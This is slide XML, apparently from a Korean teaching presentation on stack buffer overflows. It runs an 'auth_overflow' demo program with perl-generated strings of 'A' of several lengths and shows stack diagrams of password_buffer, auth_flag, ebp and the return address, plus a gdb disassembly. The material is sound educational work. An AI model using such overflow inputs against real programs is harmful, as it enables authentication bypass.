            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="4000" dirty="0"/>
              <a:t>&gt;&gt;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./</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="4000" dirty="0" err="1"/>
              <a:t>auth_overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="4000" dirty="0"/>
              <a:t> $(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="4000" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="4000" dirty="0"/>
              <a:t> –e ’print “A”x32’) ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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011397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A0470-AD98-9643-9D59-22D3BD80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365125"/>
            <a:ext cx="11275142" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&gt;&gt;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./</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>auth_overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> $(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> –e ’print “A”x16’) ?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1E3F07-62B5-3043-BE70-4C248B87869C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3510800" y="1887792"/>
            <a:ext cx="5170400" cy="4363461"/>
            <a:chOff x="5582183" y="74893"/>
            <a:chExt cx="5532508" cy="65696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B40244-AF76-A34D-9ADE-2A34152C843A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7567448" y="6167491"/>
              <a:ext cx="170267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 dirty="0"/>
                <a:t>STACK</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="25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EC430-7730-F744-B475-048A72541D58}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9553905" y="5798159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&lt;- </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
                <a:t>ebp</a:t>
              </a:r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E4BA19-C4AF-B944-AEAC-E8874D9040F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9317416" y="74893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&lt;- </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
                <a:t>esp</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1"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2477FE-4BFD-4648-9FA3-472A50E5A146}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668813" y="5482934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%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 (</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
                <a:t>check_auth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189953-5426-ED4C-8D21-D52EEB9C17C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668813" y="4829945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%</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
                <a:t>edi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8928E5-9C2E-AB4D-B549-780D0E4E028A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668813" y="4176956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%</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
                <a:t>esi</a:t>
              </a:r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B282CA-C664-3647-899B-1996991BBB6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668812" y="3525682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00</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1"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917995-8256-374B-BF2C-9DB9BE9F33F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668811" y="2872693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780E5C-DE43-644F-A38C-A2F9539BA47D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668810" y="2221419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C4DE4D-EBD7-BE41-A866-01BB3BD45955}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668809" y="1570145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926DB8-CE4C-FD45-9EDC-88B004E73873}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9317416" y="3665796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$0xc(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6CAF2E-5C9F-314A-B0F8-7FBD87D8F8B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9317416" y="3007538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$0x10(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EF5969-2851-0443-9C1A-EDA8D364E0A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9317416" y="2349280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$0x14(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F6EC39-F50C-F64B-96BC-9D459A9DFC9F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9317416" y="1691022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$0x18(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2C3A31-CFCC-014C-9C83-7A45CC33B361}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668809" y="918871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AF6E1B-C08C-CC4E-9EB7-F64A0888988F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9317416" y="1039748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$0x1c(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38A0B5B-7009-4643-990E-E11B28A3E916}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668809" y="526747"/>
              <a:ext cx="2648607" cy="39212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argv</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
                <a:t>[1]</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1"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B43C02-485C-754B-9C77-ED7BDE4392AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668809" y="117125"/>
              <a:ext cx="2648607" cy="39212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881462-16A3-C344-89EA-0363CE912BD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5616456" y="1050354"/>
              <a:ext cx="1221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password_buffer</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1"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5B58D9-1F15-8544-8551-1BBAF3C5C433}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5582183" y="3522940"/>
              <a:ext cx="1221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auth_flag</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1"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72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A0470-AD98-9643-9D59-22D3BD80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365125"/>
            <a:ext cx="11275142" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&gt;&gt;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./</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>auth_overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> $(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> –e ’print “A”x17’) ?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1E3F07-62B5-3043-BE70-4C248B87869C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3510800" y="1887792"/>
            <a:ext cx="5170400" cy="4363461"/>
            <a:chOff x="5582183" y="74893"/>
            <a:chExt cx="5532508" cy="65696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B40244-AF76-A34D-9ADE-2A34152C843A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7567448" y="6167491"/>
              <a:ext cx="170267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 dirty="0"/>
                <a:t>STACK</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="25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EC430-7730-F744-B475-048A72541D58}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9553905" y="5798159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&lt;- </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
                <a:t>ebp</a:t>
              </a:r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E4BA19-C4AF-B944-AEAC-E8874D9040F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9317416" y="74893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&lt;- </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
                <a:t>esp</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1"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2477FE-4BFD-4648-9FA3-472A50E5A146}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668813" y="5482934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%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 (</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
                <a:t>check_auth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189953-5426-ED4C-8D21-D52EEB9C17C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668813" y="4829945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%</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
                <a:t>edi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8928E5-9C2E-AB4D-B549-780D0E4E028A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668813" y="4176956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%</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
                <a:t>esi</a:t>
              </a:r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B282CA-C664-3647-899B-1996991BBB6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668812" y="3525682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00AA</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1"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917995-8256-374B-BF2C-9DB9BE9F33F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668811" y="2872693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780E5C-DE43-644F-A38C-A2F9539BA47D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668810" y="2221419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C4DE4D-EBD7-BE41-A866-01BB3BD45955}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668809" y="1570145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926DB8-CE4C-FD45-9EDC-88B004E73873}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9317416" y="3665796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$0xc(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6CAF2E-5C9F-314A-B0F8-7FBD87D8F8B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9317416" y="3007538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$0x10(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EF5969-2851-0443-9C1A-EDA8D364E0A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9317416" y="2349280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$0x14(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F6EC39-F50C-F64B-96BC-9D459A9DFC9F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9317416" y="1691022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$0x18(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2C3A31-CFCC-014C-9C83-7A45CC33B361}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668809" y="918871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AF6E1B-C08C-CC4E-9EB7-F64A0888988F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9317416" y="1039748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$0x1c(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38A0B5B-7009-4643-990E-E11B28A3E916}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668809" y="526747"/>
              <a:ext cx="2648607" cy="39212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argv</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
                <a:t>[1]</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1"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B43C02-485C-754B-9C77-ED7BDE4392AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668809" y="117125"/>
              <a:ext cx="2648607" cy="39212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881462-16A3-C344-89EA-0363CE912BD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5616456" y="1050354"/>
              <a:ext cx="1221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password_buffer</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1"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5B58D9-1F15-8544-8551-1BBAF3C5C433}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5582183" y="3522940"/>
              <a:ext cx="1221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auth_flag</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1"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43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A0470-AD98-9643-9D59-22D3BD80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365125"/>
            <a:ext cx="11275142" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&gt;&gt;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./</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>auth_overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> $(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> –e ’print “A”x32’) ?</a:t>
            </a:r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1E3F07-62B5-3043-BE70-4C248B87869C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3510800" y="1887792"/>
            <a:ext cx="5170400" cy="4763509"/>
            <a:chOff x="5582183" y="74893"/>
            <a:chExt cx="5532508" cy="71719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B40244-AF76-A34D-9ADE-2A34152C843A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7497099" y="6769805"/>
              <a:ext cx="170267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 dirty="0"/>
                <a:t>STACK</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="25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EC430-7730-F744-B475-048A72541D58}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9553905" y="5798159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&lt;- </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
                <a:t>ebp</a:t>
              </a:r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E4BA19-C4AF-B944-AEAC-E8874D9040F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9317416" y="74893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&lt;- </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
                <a:t>esp</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1"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2477FE-4BFD-4648-9FA3-472A50E5A146}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668813" y="5482934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189953-5426-ED4C-8D21-D52EEB9C17C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668813" y="4829945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8928E5-9C2E-AB4D-B549-780D0E4E028A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668813" y="4176956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B282CA-C664-3647-899B-1996991BBB6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668812" y="3525682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917995-8256-374B-BF2C-9DB9BE9F33F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668811" y="2872693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780E5C-DE43-644F-A38C-A2F9539BA47D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668810" y="2221419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C4DE4D-EBD7-BE41-A866-01BB3BD45955}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668809" y="1570145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926DB8-CE4C-FD45-9EDC-88B004E73873}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9317416" y="3665796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$0xc(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6CAF2E-5C9F-314A-B0F8-7FBD87D8F8B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9317416" y="3007538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$0x10(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EF5969-2851-0443-9C1A-EDA8D364E0A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9317416" y="2349280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$0x14(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F6EC39-F50C-F64B-96BC-9D459A9DFC9F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9317416" y="1691022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$0x18(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2C3A31-CFCC-014C-9C83-7A45CC33B361}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668809" y="918871"/>
              <a:ext cx="2648607" cy="649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AAAA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AF6E1B-C08C-CC4E-9EB7-F64A0888988F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9317416" y="1039748"/>
              <a:ext cx="15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$0x1c(</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
                <a:t>ebp</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
                <a:t>)</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1"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38A0B5B-7009-4643-990E-E11B28A3E916}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668809" y="526747"/>
              <a:ext cx="2648607" cy="39212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argv</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0"/>
                <a:t>[1]</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1"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B43C02-485C-754B-9C77-ED7BDE4392AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6668809" y="117125"/>
              <a:ext cx="2648607" cy="39212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881462-16A3-C344-89EA-0363CE912BD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5616456" y="1050354"/>
              <a:ext cx="1221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password_buffer</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1"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5B58D9-1F15-8544-8551-1BBAF3C5C433}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5582183" y="3522940"/>
              <a:ext cx="1221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auth_flag</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-K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569575-CE48-ED48-966F-874B56193EAE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5582183" y="6087942"/>
              <a:ext cx="1221830" cy="5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 err="1"/>
                <a:t>리턴주소</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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D72DC-88FC-0B49-93F1-65F2D18A7F5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4526305" y="5911157"/>
            <a:ext cx="2475253" cy="4314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69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7481E-167A-2247-A99C-1C0574E9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EEC2B-5D61-0849-B870-760FFF82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10000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="10000" dirty="0"/>
              <a:t>어셈블리어는</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="10000" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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313711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B1A95-4DDF-D74C-88F3-C8730D54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0C50E-A6F0-7A49-B28C-407CA16F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C84984-D96C-154C-85B7-192B06839226}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="154310" y="3236191"/>
            <a:ext cx="11883381" cy="695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ko-KR" sz="3700" kern="100" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Dump of assembler code for function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3700" b="1" kern="100" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3700" kern="100" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="37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3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68808-8FD2-2F41-AF6E-6CF116CF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53" y="390964"/>
            <a:ext cx="10515600" cy="6467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Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048519 &lt;+0&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
